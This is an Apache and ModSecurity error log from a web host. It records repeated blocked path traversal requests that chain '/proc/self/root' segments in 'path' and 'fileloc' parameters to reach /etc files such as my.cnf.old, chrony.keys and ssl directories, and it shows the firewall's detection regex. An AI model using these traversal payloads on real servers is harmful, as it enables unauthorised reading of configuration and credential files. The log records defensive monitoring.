[Thu Mar 19 13:53:15.528581 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:39260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwp--oXxyEfFpUF8f8kLwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:21.149273 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45508] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:53:23.657822 2026] [mime_magic:error] [pid 17887:tid 140411540502272] (70014)End of file found: [client 57.141.18.110:52390] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:53:34.691423 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:42124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqDuyqAr6etmhZHNp3OwAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:38.079276 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:59894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqEv-YZRR_7pZ7nDKi5gAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:39.926235 2026] [core:alert] [pid 17653:tid 140411624429312] [client 57.141.18.103:53068] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:53:46.127751 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46344] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:53:46.441021 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:51114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqGuyqAr6etmhZHNp3RAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:49.364115 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:60060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqHcdf6f5d65gmYZSRSgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:51.743695 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:45380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqHuoXxyEfFpUF8f8kRAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:56.352132 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:45388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqJBkFeYa1D6dYQnAJEAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:58.287228 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:45398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqJgbLMZ6AikZjR9V1EAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:53:58.783409 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.241.31:59906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqJhkFeYa1D6dYQnAJFAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:01.362921 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:40310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqJ_-YZRR_7pZ7nDKi8QAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:01.374548 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:44000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqKOoXxyEfFpUF8f8kSQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:04.852371 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:40314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqK9a6ubjKNq_cu4ZugwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:06.351283 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:40320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqLgkwaGbbGflqUZDgfgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:08.607500 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:40322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqMOyqAr6etmhZHNp3XQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:09.132859 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:44008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqMda6ubjKNq_cu4ZuiQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:11.393861 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:50406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqM-oXxyEfFpUF8f8kVAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:13.129773 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:54:15.253710 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:50418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqNv-YZRR_7pZ7nDKi_AAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:18.324393 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:59012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqOgkwaGbbGflqUZDgggAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:20.919993 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:59012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqPAkwaGbbGflqUZDghQAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:31.556473 2026] [core:alert] [pid 26799:tid 140411557287680] [client 57.141.18.53:54972] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:54:38.379530 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:51018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwqTRkFeYa1D6dYQnAJNAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:54:39.145780 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48380] AH01075: Error dispatching request to : (polling)
